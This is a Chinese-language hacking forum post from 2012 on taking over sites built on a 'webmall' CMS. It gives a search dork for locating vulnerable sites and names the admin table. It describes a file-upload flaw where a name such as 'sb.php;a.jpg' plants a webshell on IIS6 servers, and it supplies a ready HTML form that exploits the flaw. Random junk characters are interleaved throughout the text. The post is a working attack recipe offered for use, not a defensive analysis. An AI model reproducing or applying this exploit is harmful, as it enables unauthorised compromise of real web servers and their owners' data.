关键字:inurl:webmall/detail.php?id
* P- U' X+ G* q6 d9 J6 ~( {' X& C- M% F1 F {$ R7 I' s; i: U7 E
数据表:pwn_base_admin- c" N- c* t( ~7 g, \4 B! K% l
# b, L6 V g7 p关于拿shell. \" j; |8 W7 ]6 D3 O- [% f
0 m/ h( ]! T- q& @0 g# J) k m4 [" O2 z
首先登录后台admin.php
* i8 C4 I, r. \8 c( V; a % R* ]( A7 |* d+ c
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
' |: h; W5 E# L* f# A换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg$ M, r( H0 ?4 x& R- P W- c, R
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
. n" x' b- U) O1 [" w8 w<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
/ P6 d, f" O0 M8 t- V; o* N<input type="text" name="fileName" value="sb.php;a.jpg" /> # E: k8 A& u f- C4 M8 X$ S& L
<input type="hidden" name="attachPath" value="news/pics/" /> ]9 G. Y3 |' V
<input type="file" name="fileData" size="14" /></td> & h- T4 T4 {2 s7 v& N/ d
<input type="submit" name="button" value="确定" /> ; u4 Y. ^' {% ~8 _- b3 s
</form> E' q. s# \: L; k6 \
7 m( `. ^5 U+ @4 i7 |6 n首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。2 w+ t, W9 h5 c% j4 h0 {
0 a7 J1 r9 C- e0 i+ n6 m( |: t0 Z
|
发表于 2012-11-9 20:52:15
收藏
支持
反对